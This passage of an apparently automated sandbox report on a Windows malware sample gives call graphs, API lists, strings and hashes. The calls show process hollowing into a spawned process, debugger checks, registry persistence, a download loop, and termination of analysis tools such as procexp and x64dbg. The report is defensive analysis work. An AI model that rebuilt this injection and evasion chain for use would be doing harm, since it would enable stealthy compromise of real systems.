7ff6ec8425a1 1361->1363 1364 7ff6ec8425bf 1362->1364 1365 7ff6ec842595 1362->1365 1403 7ff6ec84240c ExpandEnvironmentStringsW 1363->1403 1404 7ff6ec84244c ExpandEnvironmentStringsW 1364->1404 1365->1367 1405 7ff6ec84248c ExpandEnvironmentStringsW 1365->1405 1368 7ff6ec8425b6 1368->1367 1371 7ff6ec842611 CreateProcessW 1368->1371 1371->1367 1372 7ff6ec84266c CreateFileW 1371->1372 1372->1367 1373 7ff6ec8426b3 GetFileSize 1372->1373 1374 7ff6ec8426db CloseHandle 1373->1374 1375 7ff6ec8426d1 1373->1375 1374->1367 1375->1374 1376 7ff6ec8426eb VirtualAlloc 1375->1376 1377 7ff6ec842725 ReadFile 1376->1377 1378 7ff6ec842715 CloseHandle 1376->1378 1379 7ff6ec842775 CloseHandle GetThreadContext 1377->1379 1380 7ff6ec842752 VirtualFree CloseHandle 1377->1380 1378->1367 1381 7ff6ec8427dd ReadProcessMemory GetModuleHandleA GetProcAddress 1379->1381 1382 7ff6ec8427c5 VirtualFree 1379->1382 1380->1367 1383 7ff6ec842860 1381->1383 1382->1367 1384 7ff6ec84287c VirtualAllocEx 1383->1384 1385 7ff6ec842864 VirtualFree 1383->1385 1386 7ff6ec8428e7 VirtualFree 1384->1386 1387 7ff6ec8428ff WriteProcessMemory 1384->1387 1385->1367 1386->1367 1388 7ff6ec842935 VirtualFree 1387->1388 1390 7ff6ec84294d 1387->1390 1388->1367 1389 7ff6ec842983 WriteProcessMemory 1389->1390 1391 7ff6ec842a0e VirtualFree 1389->1391 1390->1389 1395 7ff6ec842a2b 1390->1395 1391->1367 1392 7ff6ec842a9d RtlCompareMemory 1394 7ff6ec842af0 1392->1394 1392->1395 1393 7ff6ec842d1c WriteProcessMemory SetThreadContext 1396 7ff6ec842db7 ResumeThread 1393->1396 1397 7ff6ec842da2 VirtualFree 1393->1397 1400 7ff6ec842d17 1394->1400 1401 7ff6ec842c20 ReadProcessMemory WriteProcessMemory 1394->1401 1395->1392 1395->1393 1398 7ff6ec842dc9 VirtualFree 1396->1398 1399 7ff6ec842dde VirtualFree 1396->1399 1397->1367 1398->1367 1399->1367 1400->1393 1401->1394 1402 7ff6ec842cf5 VirtualFree 1401->1402 1402->1367 1403->1368 1404->1368 1405->1368 1406 7ff6ec84306c 1411 7ff6ec843075 1406->1411 1407 7ff6ec843161 1410 7ff6ec843be4 
RegDeleteKeyW 1410->1411 1411->1407 1411->1410 1412 7ff6ec843de4 9 API calls 1411->1412 1413 7ff6ec843974 3 API calls 1411->1413 1415 7ff6ec844404 CreateFileW 1411->1415 1420 7ff6ec843b44 RegOpenKeyExW 1411->1420 1412->1411 1414 7ff6ec843151 Sleep 1413->1414 1414->1411 1416 7ff6ec84449a 1415->1416 1417 7ff6ec84445f 1415->1417 1416->1411 1423 7ff6ec844384 SetFilePointer WriteFile SetEndOfFile 1417->1423 1419 7ff6ec84447b SetFileAttributesW CloseHandle 1419->1416 1421 7ff6ec843b98 RegSetValueExW RegCloseKey 1420->1421 1422 7ff6ec843bd2 1420->1422 1421->1422 1422->1411 1423->1419 1424 7ff6ec84335c 1425 7ff6ec8424cc 36 API calls 1424->1425 1426 7ff6ec84336f 1425->1426 1446 7ff6ec84317c 1447 7ff6ec843185 1446->1447 1448 7ff6ec84319e 1447->1448 1451 7ff6ec842ffc 1447->1451 1456 7ff6ec842dfc CreateMutexA 1451->1456 1454 7ff6ec843017 Sleep CreateThread WaitForSingleObject 1455 7ff6ec84305c Sleep 1454->1455 1455->1447 1457 7ff6ec842e28 ReleaseMutex CloseHandle 1456->1457 1458 7ff6ec842e45 GetLastError 1456->1458 1459 7ff6ec842e87 1457->1459 1460 7ff6ec842e6f ReleaseMutex CloseHandle 1458->1460 1461 7ff6ec842e52 ReleaseMutex CloseHandle 1458->1461 1459->1454 1459->1455 1460->1459 1461->1459 1465 7ff6ec842f2c 1466 7ff6ec843884 11 API calls 1465->1466 1467 7ff6ec842f6b 1466->1467 1468 7ff6ec844524 17 API calls 1467->1468 1469 7ff6ec842f8f 1468->1469 1470 7ff6ec844084 5 API calls 1469->1470 1471 7ff6ec842fb2 1470->1471 1472 7ff6ec8410d8 10 API calls 1471->1472 1473 7ff6ec842fc7 GetProcessHeap HeapFree 1472->1473 1474 7ff6ec842e9c CreateMutexA 1475 7ff6ec842ec1 ReleaseMutex CloseHandle 1474->1475 1476 7ff6ec842ede GetLastError 1474->1476 1477 7ff6ec842f20 1475->1477 1478 7ff6ec842f08 ReleaseMutex CloseHandle 1476->1478 1479 7ff6ec842eeb ReleaseMutex CloseHandle 1476->1479 1478->1477 1479->1477 1427 7ff6ec842160 1428 7ff6ec84218a InternetOpenW 1427->1428 1429 7ff6ec8421b7 Sleep 1428->1429 1430 7ff6ec8421c4 InternetOpenUrlW 1428->1430 1429->1428 1431 7ff6ec84224d HttpQueryInfoA 
1430->1431 1432 7ff6ec8421fb InternetOpenUrlW 1430->1432 1434 7ff6ec84227c InternetCloseHandle InternetCloseHandle Sleep 1431->1434 1435 7ff6ec8422a2 1431->1435 1432->1431 1433 7ff6ec842232 InternetCloseHandle Sleep 1432->1433 1433->1428 1434->1428 1436 7ff6ec842309 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1435->1436 1437 7ff6ec8422ac InternetCloseHandle InternetOpenUrlW 1435->1437 1438 7ff6ec842388 1436->1438 1439 7ff6ec84236e InternetCloseHandle InternetCloseHandle 1436->1439 1437->1436 1440 7ff6ec8422ee InternetCloseHandle Sleep 1437->1440 1442 7ff6ec842390 InternetReadFile 1438->1442 1443 7ff6ec8423de InternetCloseHandle InternetCloseHandle 1438->1443 1441 7ff6ec842407 1439->1441 1440->1428 1442->1438 1442->1443 1443->1441

                                                                                                                                                                                                                        Callgraph


                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: bf68687e6b01dd2cdedf4b69bf2d9525eb465aa07acbe71fc6d32d66f4173cd5
                                                                                                                                                                                                                        • Instruction ID: 503bce49048e53e40541b341e45bc146380f239c6a33232cd56c1e89f04c6c1b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf68687e6b01dd2cdedf4b69bf2d9525eb465aa07acbe71fc6d32d66f4173cd5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF612F33A1874381FB64A731EA553BB6AA8BFA4305F500036D54EC66D5DE3FE50BC60A

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction ID: d376cef746825bb56d9334072722086d35258516cf36d67e22c2b62f7f59ba1e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC311832618A81C6D750DB15E95072BBBA8FBD4784F105136FA8E83B68DF7ED442CB09

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction ID: f935717f70e07ae6f3ee91d8d3d303bcede178da4bc23e39964a7c8e46c8127a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CF0826290C282C1F7305B25AA0533B2FE8BB65708F040175E58DC6394CF2ED50BDB1B

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4294037311-0
                                                                                                                                                                                                                        • Opcode ID: bf3485979edfa6433492db17b946e1c3c98b3791ee27d21d87cd92ad9d6d8dc2
                                                                                                                                                                                                                        • Instruction ID: d57ff5c232024fb5e465e685e0138b504295d95481b28de52d114c66bfe95820
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3485979edfa6433492db17b946e1c3c98b3791ee27d21d87cd92ad9d6d8dc2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0303690C751C2EA606B20B50437B6B69FB96701F502439D98EC3A54CF3ED407D60A

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 328 7ff6ec8414ec-7ff6ec841528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF6EC8415F1,?,?,?,?,?,?,?,?,00007FF6EC843418), ref: 00007FF6EC8414FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF6EC8415F1,?,?,?,?,?,?,?,?,00007FF6EC843418), ref: 00007FF6EC841514
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: 0f6921b25e82d0f1a1fad9f77aa49d0e77a40230a9075f2808917d8fcca0e5bb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34E09276518F80C6C6209B15F84011ABBB4FBC8795F504125EACD82B28CF3DC165CB04

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 329 7ff6ec843ae4-7ff6ec843af3 330 7ff6ec843b08-7ff6ec843b0c 329->330 331 7ff6ec843af5-7ff6ec843b02 VirtualFree 329->331 331->330
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction ID: ea882aa8b8e05b600035e98eff2498f64965a96ebdde9f1229537d952643a848
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24D01222E38A41D1E7949B26E98971A6BA4FBC4744F808035E6C9C1664CF3DC19ACF05

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 332 7ff6ec8424cc-7ff6ec842546 GetModuleFileNameW 333 7ff6ec842548 332->333 334 7ff6ec84254d-7ff6ec842589 332->334 335 7ff6ec842df1-7ff6ec842df9 333->335 336 7ff6ec84258b-7ff6ec842593 334->336 337 7ff6ec8425a1-7ff6ec8425bd call 7ff6ec84240c 334->337 338 7ff6ec8425bf-7ff6ec8425db call 7ff6ec84244c 336->338 339 7ff6ec842595-7ff6ec84259d 336->339 346 7ff6ec842600-7ff6ec84260a 337->346 338->346 341 7ff6ec8425dd-7ff6ec8425f9 call 7ff6ec84248c 339->341 342 7ff6ec84259f-7ff6ec8425fb 339->342 341->346 342->335 349 7ff6ec84260c 346->349 350 7ff6ec842611-7ff6ec842665 CreateProcessW 346->350 349->335 352 7ff6ec842667 350->352 353 7ff6ec84266c-7ff6ec8426ac CreateFileW 350->353 352->335 354 7ff6ec8426ae 353->354 355 7ff6ec8426b3-7ff6ec8426cf GetFileSize 353->355 354->335 356 7ff6ec8426db-7ff6ec8426e6 CloseHandle 355->356 357 7ff6ec8426d1-7ff6ec8426d9 355->357 356->335 357->356 358 7ff6ec8426eb-7ff6ec842713 VirtualAlloc 357->358 359 7ff6ec842725-7ff6ec842750 ReadFile 358->359 360 7ff6ec842715-7ff6ec842720 CloseHandle 358->360 361 7ff6ec842775-7ff6ec8427c3 CloseHandle GetThreadContext 359->361 362 7ff6ec842752-7ff6ec842770 VirtualFree CloseHandle 359->362 360->335 363 7ff6ec8427dd-7ff6ec842862 ReadProcessMemory GetModuleHandleA GetProcAddress 361->363 364 7ff6ec8427c5-7ff6ec8427d8 VirtualFree 361->364 362->335 366 7ff6ec84287c-7ff6ec8428e5 VirtualAllocEx 363->366 367 7ff6ec842864-7ff6ec842877 VirtualFree 363->367 364->335 368 7ff6ec8428e7-7ff6ec8428fa VirtualFree 366->368 369 7ff6ec8428ff-7ff6ec842933 WriteProcessMemory 366->369 367->335 368->335 370 7ff6ec84294d-7ff6ec842958 369->370 371 7ff6ec842935-7ff6ec842948 VirtualFree 369->371 372 7ff6ec84296a-7ff6ec84297d 370->372 371->335 373 7ff6ec842a2b-7ff6ec842a72 372->373 374 7ff6ec842983-7ff6ec842a0c WriteProcessMemory 372->374 377 7ff6ec842a84-7ff6ec842a97 373->377 375 7ff6ec842a26 374->375 376 7ff6ec842a0e-7ff6ec842a21 VirtualFree 374->376 375->372 376->335 379 7ff6ec842a9d-7ff6ec842aec RtlCompareMemory 377->379 380 7ff6ec842d1c-7ff6ec842da0 WriteProcessMemory SetThreadContext 377->380 381 7ff6ec842af0-7ff6ec842b19 379->381 382 7ff6ec842aee 379->382 383 7ff6ec842db7-7ff6ec842dc7 ResumeThread 380->383 384 7ff6ec842da2-7ff6ec842db5 VirtualFree 380->384 386 7ff6ec842b24-7ff6ec842b32 381->386 382->377 387 7ff6ec842dc9-7ff6ec842ddc VirtualFree 383->387 388 7ff6ec842dde-7ff6ec842deb VirtualFree 383->388 384->335 389 7ff6ec842b38-7ff6ec842bc3 386->389 390 7ff6ec842d17 386->390 387->335 388->335 391 7ff6ec842bd5-7ff6ec842be3 389->391 390->380 392 7ff6ec842be9-7ff6ec842c1c 391->392 393 7ff6ec842d12 391->393 394 7ff6ec842c20-7ff6ec842cf3 ReadProcessMemory WriteProcessMemory 392->394 395 7ff6ec842c1e 392->395 393->386 397 7ff6ec842d0d 394->397 398 7ff6ec842cf5-7ff6ec842d08 VirtualFree 394->398 395->391 397->393 398->335
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6ec840000_audiodg.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll

Control-flow Graph

APIs
Strings
Similarity
• API ID: OpenProcess
• String ID: $@$RtlCreateUserThread$ntdll

Control-flow Graph

APIs
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6EC84219D
Similarity
• API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
• String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3

Control-flow Graph

APIs
Similarity
• API ID: FileHeap$AllocateCloseCreateHandleProcessSize
• String ID:

Control-flow Graph

APIs
  • Part of subcall function 00007FF6EC844404: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430A7), ref: 00007FF6EC84444C
  • Part of subcall function 00007FF6EC844404: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430A7), ref: 00007FF6EC844489
  • Part of subcall function 00007FF6EC844404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430A7), ref: 00007FF6EC844494
  • Part of subcall function 00007FF6EC843B44: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC8430AC), ref: 00007FF6EC843B87
  • Part of subcall function 00007FF6EC843B44: RegSetValueExW.ADVAPI32 ref: 00007FF6EC843BBD
  • Part of subcall function 00007FF6EC843B44: RegCloseKey.ADVAPI32 ref: 00007FF6EC843BCC
  • Part of subcall function 00007FF6EC843BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF6EC843BFC
  • Part of subcall function 00007FF6EC843DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6EC843DF7
  • Part of subcall function 00007FF6EC843DE4: Process32FirstW.KERNEL32 ref: 00007FF6EC843E2A
  • Part of subcall function 00007FF6EC843DE4: CloseHandle.KERNEL32 ref: 00007FF6EC843E3C
  • Part of subcall function 00007FF6EC843DE4: wcscmp.MSVCRT ref: 00007FF6EC843E51
  • Part of subcall function 00007FF6EC843DE4: OpenProcess.KERNEL32 ref: 00007FF6EC843E67
  • Part of subcall function 00007FF6EC843DE4: TerminateProcess.KERNEL32 ref: 00007FF6EC843E8A
  • Part of subcall function 00007FF6EC843DE4: CloseHandle.KERNEL32 ref: 00007FF6EC843E98
  • Part of subcall function 00007FF6EC843DE4: Process32NextW.KERNEL32 ref: 00007FF6EC843EAB
  • Part of subcall function 00007FF6EC843DE4: CloseHandle.KERNEL32 ref: 00007FF6EC843EBD
  • Part of subcall function 00007FF6EC843974: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6EC843ACC), ref: 00007FF6EC8439A4
• Sleep.KERNEL32 ref: 00007FF6EC843156
Strings
Similarity
• API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
• String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6EC843744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: GetVolumeInformationW.KERNEL32 ref: 00007FF6EC8437C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6EC843704: wsprintfW.USER32 ref: 00007FF6EC843862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC8438F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843905
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843918
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC84392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EC843A69), ref: 00007FF6EC843955
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541210317.00007FF6EC840000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1541398955.00007FF6EC845000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545624570.00007FF6EC848000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1545691957.00007FF6EC849000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000009.00000002.1546753685.00007FF6EC84B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000009.00000002.1541274487.00007FF6EC841000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EC840000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
